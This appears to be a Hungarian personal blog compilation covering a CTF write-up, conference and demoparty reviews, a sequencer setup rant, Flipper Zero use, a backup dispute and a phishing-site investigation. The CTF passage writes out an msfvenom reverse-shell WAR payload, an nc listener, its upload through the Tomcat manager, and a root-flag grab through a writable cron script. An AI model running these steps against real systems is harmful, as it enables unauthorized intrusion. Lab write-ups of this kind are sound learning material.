
Implementáció

Az első lépés, hogy a szükséges függőségeket felrakjuk. Ez már elég fájdalommentes a vcpkg-nek hála, tehát ezt kell először telepíteni. Utána már az IDE is felismeri az include alapján, milyen csomagot kell letölteni, és még a projektet is konfigurálja. Azért -disableMetrics opciót érdemes használni, mert nem akarom, hogy a felhasználói élményemet javítsák, jó az úgy, ahogy van.

A csomagkezelő a libopenmpt-t is tartalmazza, tehát azzal sem kell külön szenvedni. A libopenmpt egy hardverfüggetlen implementáció, ami azt jelenti, hogy a modulokat nem játsza le, csak dekódolja egy 48KHz-es PCM adatcsomagba, amivel utána az ember azt csinál, amit akar.

Összeraktam egy kezdetleges formát, hogy ismerkedjem az API-val. Gond nélkül lefordul, hiba nélkül lefut, de nem hallani semmit. Én már annak is örülök, hogy nem fagy le és nem rántja magával az egész operációs rendszert. Nem hallatszik a zene? Részletkérdés :-)

A CTF indító oldala mellett a Tomcat logót lehet látni, amiből sejtheti az ember, hogy miféle feladatot kell megoldani. Az első lépés az nmap, ami meg is erősíti a feltevésünket.

Rövid keresgélés után a 8.5.5-ös Tomcathez találhatunk egy rakás sebezhetőséget. A legtöbb valamilyen hibás konfogurációt használ ki. Az egyik a CVE-2017-12617, amihez egy szkript is van az exploitDB-ben. Sajnos nem működik. A másik hiba a Jserv protokolt használja ki. (admin/http/tomcat_ghostcat) Ez működik, de tudni kell, hogy milyen fájlt akarunk megnézni. Az egyetlen fájl, aminek meg tudom jeleníteni a tartalmát a web.xml, de ebben semmi érdekes információ nincs. Mivel a Tomcat a tomcat-users.xml-ben tárolja a felhasználónév/jelszó párosokat, ezért megnéztem meg tudom-e nyitni, de ezzel sem értem el sikert. Van egy másik modul Metasploit-ban, ami az alapértelmezett jelszavakat próbálgatja (scanner/http/tomcat_mgr_login). Végigfutott, de eredmény nélkül.

Kínomban már kézzel is írtam be felhasználónév és jelszó párosokat, hátha szerencsém lesz, de nem volt. Sajnos nem voltam elég alapos, így csak sokadjára tűnt fel, hogy a hibás bejelentkezés után van egy elejtett infó. Kipróbálva az ott látható felhasználónevet és jelszót, be tudunk lépni a management felületre. Ismét csak bebizonyosodik, a CTF-eknél minden információ fontos. Még az is, amire legyintünk.

A felületen fel tudunk tölteni WAR modulokat. Készítsünk egy reverz shellt az msfvenommal:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.23.71.181 LPORT=9001 -f war -o pen.war

Aki nem tudná, az msfvenom egy malware készító csomag, amivel játszi könnyedséggel lehet bármilyen reverz shellt készíteni. Az LHOST-al adom meg, hogy hova próbáljon meg csatlakozni, az LPORT-al pedig értelemszerűen a portot adom meg.

Először előkészítjük a terepet egy nc-vel a gépünkön:

nc -lvnp 9001

Utána feltöltjük a pen.war-t és ráklikkelünk. Egy idő után létrejön a kapcsolat. Az első flag a /home/jack könyvtárban van. A flag mellett találunk egy id.sh szkriptet is, ami szerencsére írható. Az /etc/crontab szerint a root ezt rendszeresen futtatja is. Az id.sh-ba létrehozhatunk egy újabb reverz shell-t, de én csak beírtam egy cat /root/* >ize-t. A root flag az ize fájlban lesz.

Idén is elmentem a budapesti BSides-ra, sőt a tavalyi Hacktivity fiaskó után már laptopot is vittem. A kiállítók száma erősen visszaesett, már csak a legkeményebbek képviseltették magukat. Ketten. Az előadások viszont ígéretesnek tűntek, ezért rögtön be is ültem rájuk.

Az első előadásban, amit meghallgattam, a bug bounty programok tapasztalatait osztotta meg az előadó. Négy általa bemutatott hibát prezentált. Annyit szűrtem le, hogy a hiba megtalálásához szükséges tudás nincs összhangban a kapott pénzdíjjal. Bemutatott egy hihetetlenül bonyolult módszert, amihez négy különböző sérülékenységet kellett kihasználni, vért izzadt, mire meglett a hiba, és a végén a cég nem is akart fizetni neki. (De azért meggyőzte őket, hogy komoly a probléma, mire adtak neki 500 dolcsit). Egy másik esetben pedig talált egy konfigurációs hibát, amivel ki tudta listázni az összes felhasználót, azért meg 13 ezret kaszált.

A második meghallgatott előadás a házi laborok fontosságáról szólt. Az előadó bemutatta saját otthoni káoszát, ami olcsó Raspberry Pi-okból, régi routerekből és elavult laptopokból állt. Azt mondta, a teljesítmény nem fontos, ha az ember új technológiákat akar megtanulni. Az előadás nagyon inspiráló volt, sok technikai részletre nem tért ki, inkább a lehetőségeket mutatta be saját példákon keresztül.

Az előadások után bementem a HACK Centerbe, ahol szokás szerint zárakat próbáltak kinyitni emberek. Én inkább a CTF-ek iránt érdeklődtem, mert idén először azok is voltak. Az első körben egy 4chan típusú fórumon kellett keresni a flageket. A fórumra weboldalát viszont nem tudtam megnyitni a laptopommal. Az egyik szervező szerint a hálózat a hibás, de a telefonnal meg tudtam nézni az oldalt, ugyan arról a wifiről. Amikor curl-el próbáltam meg letölteni a tartalmat, 451-es hibát kaptam. Életemben nem hallottam még ilyen hibáról, és mint a Wikipédiáról megtudtam, törvénysértő tartalmak esetén kapunk ilyen kódot. Az viszont továbbra is rejtély számomra, hogy miért működött telefonról, illetve miért működött másoknak. Otthon is kipróbáltam, és egy flaget sikerült megtalálnom.

Egy másik feladatban Minecraft térképet kellett megfeleltetni valós földrajzi pozíciónak. Linuxon nem tudom, hogyan lehet ezt a fajta fájlt megjeleníteni, úgyhogy fél óra eredménytelen Google keresés után hanyagoltam.

A webes feladatok között volt egy captcha kijátszás is, azt sikerült megcsinálnom. A captcha egy matematikai művelet volt, amit CSS-el megbolondítottak, hogy furcsán nézzen ki. Ha viszont valaki csak a HTML-t parse-olta, akkor könnyen ki tudta nyerni a művelet elemeit. Ezután már csak ki kellett számítani az értéket. Száz captcha után megkaptam a flaget.

Két feladathoz BME-s VPN-t kellett volna használni, ezért azokat is inkább kihagytam. Egy másik esetben egy tűzfalon kellett volna átmenni. Ezzel sokat próbálkoztam, de nem jártam sikerrel. Volt még egy online tesztrendszer törés. Itt valószínűleg XSS-t kellett volna használni, de abban nagyon rossz vagyok, úgyhogy hosszas próbálkozások után ez sem sikerült.

Volt három reverse engineering feladat is. Ezek is elég nehezek voltak (legalábbis nekem), nem is sikerült egyik sem.

Az oldalon volt táblázat, hogy hány embernek sikerültek a különböző feladatok. Meglepett, hogy milyen kevesen próbálkoztak. Azt gondoltam, többen fognak játszani.

Délután egy kerekasztal beszélgetésben vettem részt, ami a kiírás szerint azt igyekezett bemutatni, hogyan ne legyünk hekkerek. A témához nem kerültünk túl közel, mert ez egy kísérleti program volt, a beszélgetés vezetője inkább arra volt kíváncsi, hogyan bonyolítson le egy ilyen beszélgetést, a hallgatók meg inkább válaszokat szerettek volna. Mindegy, valahol ezt is el kell kezdeni. Talán a következő konferenciára jobban összeszedik magukat.

Összességében nem volt rossz, örültem, hogy ott lehettem.

Idén elméletileg a családi tanács engedélyezte volna a kiutazást, de végül nem éltem a lehetőséggel. Később bebizonyosodott, hogy nem volt rossz ötlet a szófa scenerkedés, de azért végre elkészült egy release is, amit sikerült feltölteni a Revision szerverére. Az ünnepi kavalkád miatt nem tudtam követni az összes eseményt, de utólag bepótoltam mindent, ami hosszabb időt vett igénybe.

3D grafika

A kompó kezd érettebb lenni. Míg kezdetben csak némi 3D bohóckodás jellemezte a releaseket, most úgy érzem kezdenek komolyabb alkotások is megjelenni, melyek tényleg kihasználják a 3D lehetőségeit. Az "And The Legend Continues" például kis easter egg-et is tartalmaz (Húsvétkor úgyis aktuális), ami csak bizonyos térbeli forgatásnál látszik. KD "Unexplored Future" alkotását nézve nekem rögtön beugrott egy DeLorean témájú jelenet tavalyról. És tényleg, a mindkettőt KD készítette. Az én kedvencem RacconViolet mókusos grafikája volt, aminek poénját csak retro számítógépesek tudnak igazán értékelni.

Fotó

Közhelynek számít, hogy a telefonok kamerája egyre jobb, de eddig azt láttam, hogy a scenerek nagy része továbbra is előnybe részesítette a kamerákat. Idén a telefonokkal készült képek száma mintha megnőtt volna, ami érdekes módon nem ment a minőség rovására. A másik véglet pedig visszatérés a filmes gépekhez. Ezek főleg egymásra rétegezett képek voltak. Számomra a legjobb alkotás a Crab in space volt.

ANSI/ASCII/PETSCII

Az idei karakteres grafikák nem voltak olyan jók. Túl egyszerűek voltak az én ízlésemnek.

Animált GIF

A loopolt hangtalan minivideók egy érdekes kategória, mert rengeteg erőforrást el lehet pazarolni az elkészítésükre, miközben az eredmény egy pici GIF. Nézzük például a Bag Work-öt, ami egy komplett karakter animáció, fizikai szimuláció, stb. A leírás szerint Maya-val renderelték, valószínűleg jó sok erőforrással. Ellenpontnak meg ott van a "Let's Go and Get a Snack Before the Next Compo Block", ami Deluxe-paint-el készült (ez egy 30 éves program). Az én kedvencem a City Limits, ami valahol a kettő között helyezkedik el. Ami miatt ez lett a kedvenc, az a keretet elhagyó űrhajó.

Modern grafika

Ha lenne egy olyan 3D grafikus a csapatban, mint Darkki, akkor nem kérnék mást Karácsonyra az elkövetkező 5 évben. (Max azt, hogy tudjak egy olyan engine-t írni, ami képes támogatni a modelljeit) Ezt bizonyítja a Lepidopterist című képével is.

4k executable grafika

Kevés, de jó minőségű nevezés volt a futtatható grafikák között. Kedvencem a Quattro volt, mert "Inertia drift!".

Videók

Természetesen a mién volt a legjobb. Na jó, nem. Ötödikek lettünk, de akik megelőztek, azok mind jobbak voltak, ezt el kell ismerni. Bevallom, az dühített volna, ha Nosfe zajdemója jobb helyezést ért volna el. Az első helyezett egy nagyon kreatív invitáció lett a NoGapNoBacteria-tól. A videó invitációk legtöbbje nagyon sablonos, többnyire megelégszenek néhány bevágott fényképpel vagy videóval a korábbi partikról, majd a végén szövegben odalökik a részleteket. Itt viszont nagyon kitettek magukért a készítők. A poénok legtöbbje bennfentes, de mégis csak egy invitációról beszélünk. Scenerek a célközönség.

Játékok

A scenerek megpróbáltak egyéni játékokat készíteni, de valahogy mindegyik egy ismert játék újragondolása volt. A Noisy Rabbit egy pac-man klón volt, csak nyulat kellett irányítani. A Fartageddon egy Wolfenstein klón volt, csak a nácik helyett öregasszonyokat kellett egy hascsikarásos kutyával leszellenteni. Az Axteroids...biztos kitaláltátok minek a klónja. A KaButt semminek nem volt a klónja. A forgó kockát nézve ki kellett találni, hogy milyen videomódba állították a Nintendot. Tegye fel a kezét, aki játszani akar vele.

Tracked music

Egy csapattárs is indult ezen a kompón: Filippp. Szegény utolsó lett. Személyes kedvencem a Retroing all Down Jessusitotól. Tavaly kezdte karrierjét, úgy tűnik ez az első külföldi szereplése. A másik nagy kedvencem E1M777 volt Master Boot Record és Dubmood trackeréből. A zene nagyon gyorsnak és sűrűnek hangzott. Nem is csoda, 39 hangszer és negyvennél is több mintát használtak fel, ami a kompón belül akár rekordnak is beillik.

Oldsckool music

Filippp itt már nem lett utolsó, de a középmezőnyig sem jutott. Azért egy ZX Spektrum soha nem lesz ellenfele egy Amigának vagy Atarinak. FLT-nek soha nem fogom megbocsátani ezt, de azt el kell ismernem, hogy nagyon jó zenét hozott idén Revision-re. A Neon Slipstream kicsit monoton volt, de azért elég kellemes zene. A Crystal Oscillator viszont mindenkit maga mögé utasított. Ebben azért az Otamata Lab-nak nagy segítségére volt egy OPL3 chip is, ami nagyon másként szól, mint a többi retro hardver.

Executable music

Ki indult még ebben a kategóriában? Igen, Filippp. Ha ennyire termékeny a srác, lehet, hogy vele kéne kooperálni?  Nem volt rossz, amit készített, de egy kicsit repetitívnek éreztem. Kedvencem Xtriumtól az Echoes volt, bár csak a negyedik helyet érte el.

Amiga intró

Elég kevés intró volt, legtöbbjük nem túl izmos, így a Dekadence invitációja torony magasan verte a mezőnyt.

Amiga demó

A Tűzgésa sokkal több volt, mint emlékirat. A Nah-Kolor demója azért tetszett, mert az Amiga demók hajlamosak pasztel színekben tündökölni, itt pedig gyönyörű élénk színek voltak. Az Entropy Chamber bár nem tűnik nagyon érdekesnek, ügyesen imitálja a sugárkövetést. Legalábbis azt gondolom, hogy imitálja. Elvégre valódi sugárkövetés az lehetetlen. Ugye, lehetetlen? Ami viszont a legjobban tetszett, és ami a pálmát el is vitte, az a Lupus Reditus volt. Szuper farkasemberes demó, remek kóddal, összeszedett grafikával, egységes stílussal. Engem magával ragadott.

Oldskool demo

Két magyar induló is volt, Kaszi a ZX Spectrum fenegyerek egy könnyed demóval, míg a Lethargy csapat David Lynch-ről emlékezett meg. Nekem személy szerint a 3DManiaks2 tetszett, bár egy kicsit hirtelen lett vége. A leghangulatosabb viszont a The Trip volt a Fairlight-tól. A legtöbb demoscene utalást valószínűleg nem értettem, arról valószínűleg beszélgetnem kellene másokkal. De ilyen egy jó demó, nem? Van utóélete.

PC 64k

Nos, a Tension mindent elhomályosított maga körül. Ez a 64k a demók között is megállta volna a helyét. Ilyen kidolgozott modelleket, textúrákat nem sűrűn látni ebben a kategóriában. Tényleg szóhoz sem jutottam. Maga a rendezés számomra kicsit kusza volt. Nem világos, hogy ki kit üldözött és miért, de talán nem is fontos. A techdemók szerelmeseinek kötelező darab.

PC 8k

Archee Pac-Quack intrójában négy kacsa hihetetlen hatékonysággal nyelte a nokedlit golyókat. Másik hazai vonatkozású intró a Circle volt. A kódot Tifeco, a zene egyik felét pedig Teo adta. Mindenféle forgó bigyó volt benne, amik egyre gyorsabban forogtak. Az én kedvencem a birka és a motoros konfrontációja volt a Ctr-Alt-Test tálalásában. A másik pedig a Farbrausch Júlia fraktáljai.

PC 4k

A HBC nem sok intrót készített, ezelőtt 5 évvel adtak ki 4k-t. Most viszont láthattuk tőlük egy szép folyadékszimulációt. Nagyon kellemes, még kívülállóknak is bátran lehet ajánlani. Aki imádja a fraktálokat és az alliterációkat, annak a Dipping Deep Dub Drop kötelező darab, mert megkapja mindkettőt. Bár maga a kód nem volt bonyolult, ötletes volt az átmenet az egyes vizuális stílusok között. A Hexer egy rémisztő intró, ami bátran merít a Körből és az internetes creepypasta témákból. Intró kategóriában érdekes témaválasztás. Személyes kedvencem a Chromatophores volt a Loonies-tól. Technikailag rendben volt, nagyon szépen néztek ki a tekergő izék.

PC Demó

Végül lássuk a király kategóriát. A Still demója 200MB volt, elsőre nem indult, mert kellett neki a .Net 9, utána elindult. Az eleje nagyon jó volt, már vártam, hogy beindul, erre vége lett. Egy régi vicc jutott eszembe, amikor a kuncsaft fut az örömlány után azt kiáltva: még nem végeztél. Na, mindegy. Az ASD annyira művész lett, de olyan művész, hogy levetette minden demoscene kvalitását. De a hangyák annyira élethűek voltak. Éjjel néztem a demót, és komolyan azt hittem, mászik egy a monitoromon. A Melodice egészen jó volt. Dobókockák voltak benne, nagyon sokan. Remekül megmutatta, hogy ha csak egy modelled van, és jól használod ki, élvezetes demót is lehet készíteni. Ha viszont nagyon jó modelleket készítesz, akkor olyan demókat is alkothatsz, mint a This is Us. Az Exist már két éve is feltűnt alaposan kidolgozott modelljeivel és textúráival. Akkor azért kritizálták őket, mert a demó vége felé már kicsit sietősebbre vették a figurát, ami az assetek kidolgozottságán meg is látszott. Itt nem követték el ugyan azt a hibát. Ha van olyan, hogy kóder pornó, akkor ez az asset pornó. A Quantum Space One-t az AI zene miatt kritizálták, de szerintem teljesen rendben volt. Nagyon szép geometrikus mintázatokat mutatott. Személyes kedvencem MFX-től a Breach volt. Már korábban is láttunk részecskerendszert az MFX-től, de nem érződött, hogy ez a demó a korábbi kódok újrahasznosítása lenne.

Az egyik kutatócsoport vett egy MiSeq 100i-t, mert kevesebb leolvasási hibával, gyorsabb futási idővel rendelkezik, mint a hasonló teljesítményű korábbi modellek. Ez a készülék egyértelműen mutatja, hogy az Illumina is elindult az Apple irányba, nevezetesen minél kevesebb beleszólást enged a gép működésébe, redukálják az elérhető beállítási lehetőségeket és amint látni fogjátok sokkal nagyobb terhet ró a supportra.

A készülék futurisztikus külsővel rendelkezik. Míg a korábbi MiSeq modellek úgy néztek ki, mint egy laboreszköz, ez inkább egy otthoni szórakoztatóelektronikai műtárgyra hasonlít. Bekapcsolni a hátulján lévő billenő kapcsolóval lehet, de ettől nem fog elindulni! Van elöl, az alsó peremén egy másik bekapcsoló gomb (amit persze szemből nem lehet látni), ami ha világítani kezd, azt is meg kell nyomni. Ekkor indul el. A megoldás engem a csuklós buszok titkos kapcsolójára emlékeztet, ami segítségével a sofőr felszállhat.

Bekapcsolás után jó sokára elindul. A felhő integrálás teljes, tehát a készülék nem menti a szekvenálási eredményeket, hanem egyből a BaseSpace-re tölti fel. Ami természetesen fizetős, mert 2025-ben már nem menő, hogy egy cég ne kérjen folyamatosan pénzt egy termékért, ezért folyamatosan olyan szolgáltatásokat integrálnak a gépekbe, amivel rendszeres fizetésre kényszeríthetik a vásárlót. Magyar akadémiai viszonyok között ez természtesen elfogadhatatlan, még olyan jól menő csoportoknál is, akik megengedhetik, hogy ilyen szekvenálókat vásároljanak (és fenntartsanak), ezért nekem kellett volna beállítani, hogy a labor szerverére mentse az adatokat.

A csoport tulajdonában van egy NextSeq 2000-es is, ahol már beállítottam ezt a lehetőséget, ezért arra gondoltam, itt sem lesz gond. A vezérlő programban van egy opció, ahol be lehet írni a távoli szerver IP címét, kiválaszthatjuk, hogy NFS vagy Samba legyen a protokoll, és kérünk-e titkosítást. SMB esetén jelszó és felhasználó név beállítás is van.

Először NFS-t akartam használni. A szerveren engedélyeztem a szekvenáló IP címét, ahogy a NextSeq 2000-essel is csináltam, majd megpróbáltam kapcsolódni. Annyit írt a szekvenáló, hogy hiba. Volt egy View Details is, ami annyit írt Invalid DTO. Ennél semmitmondóbb hibaüzenetet akarva sem lehet kitalálni.

Oké, nézzük az SMB-t, bár amióta CTF-eket csinálok, nem szeretem ezt a protokollt, de a SeqPilot miatt sajnos elkerülhetetlen, hogy a szerveren fusson Samba. Már nem emlékeztem a jelszóra, amit beállítottam, ezért az ott dolgozóktól kértem el. Ezzel sem tudtam kapcsolódni, jóllehet a hibaüzenet megváltozott invalid credential-re.

Nem részletezem, de ezután ugyan azokat a köröket rottam a beállításokkal, eredmény nélkül. Random váltogattuk az opciókat, hátha szerencsénk lesz, de nem volt. Mivel a NextSeq 2000-es egy Linuxot futtat, és ki lehet menni a konzolba, elhatároztam, hogy itt is kimegyek, hogy megnézzem, egyáltalán a hálózati beállítások jók-e. Találok-e olyan logokat, amelyek a semmitmondó hibaüzenet helyett a hiba valódi okára derítenek fényt.

Először is, a vezérlő alkalmazást nem lehet megkerülni. Nincs minimalizálás, ha kilépünk belőle, leáll a szekvenáló. Egy OS Terminál menüpont tűnt ígéretesek, de mikor el akartam indítani, egy kódot kért, amit csak a support tud megadni, és most jön a csavar: a megadott kód csak 24 óráig érvényes!

Felhívtuk a magyar supportot, akik azt mondták, hogy ők sem ismerik ezt a kódot, kell szólniuk az Illuminának. Az Illumina elküldte a kódot nekik, de utána elkezdtek kekeckedni velünk, hogy minek az nekünk? Elmondtuk, hogy mit szeretnénk, ők meg megmondták azokat a lépéseket, amelyeket mi már rég kipróbáltunk.

Elmeséltük, hogy ezen a részén már túlvagyunk, nekünk kell az a rohadt terminál, adják már meg a kódot. A support még értetlenkedett egy sort, meg megnéztek még egy YouTube videót, hogyan kell beüzemelni (mi meg közben a telefon másik végén vártunk), meg megpróbálták bemesélni nekünk, hogy biztos azért nem megy, mert nem az admin felhasználóval próbálkozunk. (Pedig azzal voltunk bejelentkezve, mert olvasni még tudunk.)

Végül beleegyeztek, hogy megadják a kódot. Csakhogy a terminált nem úgy kell indítani, hogy ráklikkelünk egy menüpontra. Nem, nem. Az túl egyszerű lenne. Megpróbálom visszaidézni a lépéseket, de bocsásson meg mindenki, ha bizonyos lépéseket kifelejtek.

Először is, van egy titkos felhasználó, a nsi:vpronin, vagy valami hasonló. Utána kell a jelszó vp: és egy napi jelszó. Ezt kb. 5-ször írtuk be, mire kiderült, hogy nem kell a 'vp:', csak a napi jelszó. A support még kötötte az ebet a karóhoz, hogy "de kell a vp:". Utána képesek voltunk elérni a Linux grafikus felületet, de csak egyetlen ikon volt elérhető. Ha arra ráklikkeltünk, feljött egy terminál program, ahol 0-2 között kellett kiválasztani egy számot, attól függően, hogy mit akartunk. A terminálhoz a 2 kellett, majd mégegyszer be kellett írni a napi jelszót! De a support figyelmeztetett, hogy ha 10-nél többször írjuk be hibásan a jelszót, az egész szekvenáló lezár.

Kb. három próbálkozás után leálltunk, mert nem fogadta el a napi jelszót. Sem kettősponttal, sem anélkül, se magyar, se angol billentyűzetkiosztást feltételezve.

Nekem el kellett mennem, de a supporttól kijött valaki, és még két órán keresztül próbálkozott a beállításokkal, sikertelenül. Megbeszéltük, hogy holnap eljön mindenki, és újból megpróbáljuk.

Közben este ellenőriztem, hogy minden rendben van-e az SMB-vel, így derült ki számomra, hogy rossz jelszóval próbálkoztunk. A helyes jelszó megadása után még VPN-ről is tudtam csatlakozni. Másnap, a support érkezése előtt kipróbáltuk az SMB-t, de immár a helyes jelszóval. Továbbra sem ment.

Megérkezett a support is, egy órát vezetett, hogy itt lehessen. Újraindította a szekvenálót, beírt mindent ugyan úgy, mint mi, és akkor működött. De csak az SMB, az NFS akkor sem.

- Majd a következő verzióban javítani fogják, hogy ne ragadjanak be beállítások. Két Linux van benne, és néha rosszul szinkronizálják a beállításokat.

Kösz. Köszönöm Illumina, hogy lehetetlenné teszed, hogy beállítsam a szekvenálót. Köszönöm a semmit mondó hibaüzeneteket. Köszönöm, hogy időt és energiát fecséreltél egy olyan vezérlőprogram kifejlesztésére, ami annyira biztonságos, hogy már használhatatlan. Köszönöm a hiányos doksikat és marketing szagú brossúrákat, amik tíz oldalon keresztül tárgyalják a nagy semmit.

Ha tehetek egy fejlesztésre vonatkozó javaslatot, akkor tegyetek a szekvenálóba egy nagy nyelvi modellt, hogy ne csak a supporttal, de magával a készülékkel is lehessen vitatkozni. Már csak ez hiányzik az életemből.

A Flipper Zero hivatalos firmware-jeben van egy kis tapasztalati rendszer. Minél többet használjuk a különböző funkciókat, ez a tapasztalati pont növekszik. Ha eléri a hármas szintet, akkor az animációk is megváltoznak. Az egyiken például a delfin a gondolataival elpusztítja a Földet fenyegető űrhajókat.

Mire használtam eddig? Oktatásnál az összes terem projektorát tudom vezérelni. Az irodák beléptető kártyáit is tárolom. A bluetooth billentyűzet funkcióval nem kell az előadásoknál és a gyakorlatoknál a gép mellett ácsorogni, akkor is tudom görgetni a diákat. Ezeket heti szinten használom.

Az egyik teremben viszont csak asztali gép van, bluetooth nélkül (ráadásul a terem végében). Kipróbáltam, milyen lenne, ha a Flipper Zero-t rákötöm, mint billentyűzetet, és a mobiltelefonnal vezérelném. Bár a távolság kb. 15 méter volt, néha több diát is átugrott. Nem volt sikeres a kísérlet.

Ha GTA-val játszom, és hirtelen ott kell hagyni a játékot, akkor 15 perc inaktivitás után kidob. Ezt a Mouse Jigger funkcióval lehet kicselezni. A Flipper úgy csinál, mintha a mozgatnám az egeret. Mások a kontrollert szokták összegumizni, de az én megoldásom elegánsabb.

Kezdetben csak egy monolitikus kernel volt, ha uj funkciokat akartunk, akkor az egész firmware-t frissíteni kellett. Most már egyre több funkciót vezetnek ki appokba.

Appokat fejleszteni C-ből lehet. Az API elég logikus. Egyetlen gond, hogy néha a firmware frissítés után megváltozik az API verziószáma, ami miatt a korábban fordított programok nem mennek. Szerencsére már szkriptelni is lehet, így nem kell folyamatosan fordítani a kódokat. Eddit mikroPython és JavaScript értelmező van hozzá. Jelenleg a JavaScript több dologra használható, de a microPython sem rossz.

A rádióvevőt csak családlátogatásnál használom, mert ott van távirányítós a kapu. Ez érdekesen működött, mert volt olyan, hogy egy firmware frissítés után a kaput nem tudtam kinyitni, újra kellett tanítani a készüléket.

A GPIO portokat eddig csak egyszer használtam, de vannak még ötleteim. Egyszer próbáltam UART hídnak használni, de rossz portot találhattam, mert nem tudtam kapcsolódni. Aki akar, bevásárolhat számtalan kiegészítőt is. Én egy VideoGame modullal bővítettem, főleg a HDMI kimenet miatt, de ebben a modulban még sok kiaknázatlan potenciál van. (Különösen, hogy Flipper nélkül is működik)

Nem csak a firmware, de a webes támogatás is fejlődött. Ma már közvetlenül a telefonról lehet appokat telepíteni a Flipperre, sőt a frissítések is azon keresztül érkeznek. Aki mégis okostelefon nélkül használná, annak a van webes megoldás is.

Egyre-másra jelennek meg a klónok és Flipper-gyilkos eszközök. A kügyü-mániások örülhetnek, hogy a cégek versenyeznek a kegyeikért. Mindegyik visz is egy kis újítást az eredeti receptbe, de egyiket sem látom annyival jobbnak, hogy érdemes legyen lecserélni a delfint.

Nagy nehezen kihevertük az adatvesztést. Végre van biztonsági mentés megint. Azt hitttem, most már kezdünk egyenesbe jönni. Hát nem.

Megkerestek, hogy megint le kellene tölteni egy csomó adatot, és úgy látját, hogy a backup könyvtárban mennyi hely van! Oda szeretnének menteni, de nincs írási joguk. Persze, hogy nem tudnak írni, mert akkor az nem backup lenne, hanem szeméttároló.

Szépen, udvariasan megírtam, hogy a backupba ők nem írhatnak semmit, azt a biztonsági mentésért felelős program kezeli. De az a sok csábító terabyte! Ott van üresen. És ők nem írhatnak bele! És úgyis csak "rövid időre" kellene.

A válaszom: Nem. Először is, nincs olyan, hogy "rövid idő". Ott fog maradni az idők végezetéig, vagy amíg le nem törlöm. Másrészt a problémák nem arról híresek, hogy megvárják, amíg letelik a "rövid idő". Azonnal beütnek.

Arra kértek, cseréljem meg a backup és a munka tárhelyeket. Kiderült viszont, hogy már most annyira foglalt a munkának fenntartott raid tömb, hogyha azt mind a backup-ra rakom, akkor további adatokat már nem lehetne rámenteni. Tehát a backup nem tudná betölteni a szerepét.

Átnéztem, mi az, ami miatt nem lehet a "munkába" menteni. Tizenkilenc Tb publikusan letölthető nyers adat terpeszkedett ott. Ezt még két éve töltötte le egy munkatárs, azóta a logok szerint rá sem nézett. Igazából ez az az adatszett, ami miatt annak idején hagytam magam rábeszélni, hogy szűntessük meg a backup-ot, mert "rövid időre" kellett a hely.

A legrosszabb hiba az, amit az ember újra elkövet, úgyhogy azt mondtam, tessék tárhelyet vásárolni, vagy szemetet törölni. A backup marad. Biztos nem tetszett nekik, amit mondtam.

Közeleg a Húsvét. A hallgatók már a vonatjegyeket foglalják a hazaútra, az egyetemi dolgozók a szabadságukkal toldják meg hosszú hétvégét, hogy minél több időt szentelhessenek családjuknak. Mindenki a csokinyulak, sonkák és festett tojások megemelkedett fogyasztására készül. Én meg a Revision-t várom már nagyon. Lankad a figyelem, az emberek gondolatai máshol járnak.

Kik nem pihennek ilyenkor? Természetesen a jelszólopók. Egy ügyes húzással a Húsvét előtti napokra ütemezték az adathalász támadást. Nem akarok hazudni: én is majdnem bedőltem nekik.

A levél szerint le fog járni a jelszavam, de a levélben foglalt link segítségével megtarthatom a régi jelszavamat. Ilyen leveleket tényleg szokott kiküldeni az IT, de ők új jelszót szoktak kérni, nem engedik a régi megtartását! Viszont őszintén megmondom, nem volt kedvem pont ezen a napon jelszót változtatni, egy csomó munkát akartam letudni a tavaszi szünet előtt, nem hiányzott még ez is. Félre is dobtam a levelet, hogy a határidős teendőkkel foglalkozzam.

Viszont nem hagyott nyugodni, hogy miért kell ez a cécó, hogy megtartsam a régi jelszavamat? Újra megnyitottam a levelet és jobban megnéztem. A válasz a kérdésemre a linkben rejlett, ami nem egyetemi domainre mutatott. Ahá, értem már! Utána már feltűnt a megszólítás hiánya, és az is, hogy a feladó egy teljesen másik egyetem munkatársa (ezt elsőre is láttam, csak ezen az egyetemen is alkalmazásban állok, ezért nem kapcsoltam).

A szerver, amire át akartak az adathalászok vinni, már érdekesebb volt. Egy kb. 12 éves brazíliai telemarketinggel kapcsolatos weboldal volt rajta, ahol valószínűleg egy fájlfeltöltési hibát használtak ki a támadók (a nevezetes uploaded_script.php). A könyvtár listázás nem volt kikapcsolva, ezért szépen látszott minden fájl és könyvtár a webszerveren. Legérdekesebb a cgi-bin könyvtár volt, 2013-as dátummal. Nem is tudom, mióta nem láttam cgi-bin könyvtára.

A támadók készítettek egy alkönyvtárat (bc), feltöltötték a saját kódjukat, kiküldték az adathalász leveleket, majd várták az áldozatokat. A létrehozás dátuma alapján aznap reggel töltötték fel a kódokat, amikor az email-t megkaptam. A felület három részből állt: Egy HTML-ből, ami az adott egyetem levelező rendszerének bejelentkező oldalát utánozta rendkívül részletesen.

Ez nem a korábban látott fércművek egyike. Volt még ezen kívül egy PHP kód, és egy szövegfájl (sayee.txt). Ez utóbbi tartalmazta a már ellopott email címeket és jelszavakat. Természetesen mindenféle titkosítás nélkül. A fájl formátuma a következő volt (a benne szereplő adatokat megváltoztattam):

--------------+ FT +--------------nUs3rn@m3: victim1@uni-versity.hunP@55: password123nIP: ---------------------------------------------------------nCity: Region: Country Name: Country Code: ---------------+ FT +--------------nUs3rn@m3: victim2@uni-versity.hunP@55: passwordnIP: ---------------------------------------------------------nCity: Region: Country Name: Country Code:

Nagyon furcsa fájlformátum. Én biztosan valami sokkal struktúráltabb formát választottam volna, hogy könnyebb legyen dolgozni vele. Ez az 'n' karakteres elválasztás nem túl hatékony. Mivel l337 kódot használt, biztos egy nagyon komoly hekker :-)

Viszont felfigyeltem arra, hogy van egy másik könyvtár is (dc), hasonló elnevezésű fájlokkal. Megnéztem az ottani statikus HTML-t, mire a Széchenyi egyetem levelezőrendszerének utánzata jelent meg. Nocsak, nocsak, egy egyetem már nem is elég? Arra számítottak a támadók, hogy a nyuszi két helyről is hoz jelszavakat?

Összeszedtem az információkat, majd írtam a két egyetem helpdesk-jére. Az én egyetemem gyorsan reagált, megköszönték a segítséget, és küldtek egy köremailt, hogy vigyázzanak ezzel a levéllel. A Széchenyiről eddig nem kaptam választ. Akárhogy is, napi jócselekedet kipipálva.

Emlékeztek még az tavalyi Assembly-re készített produkciónkra? Nem? Persze, hiszen nem release-eltük. De miért? Hol is kezdjem?

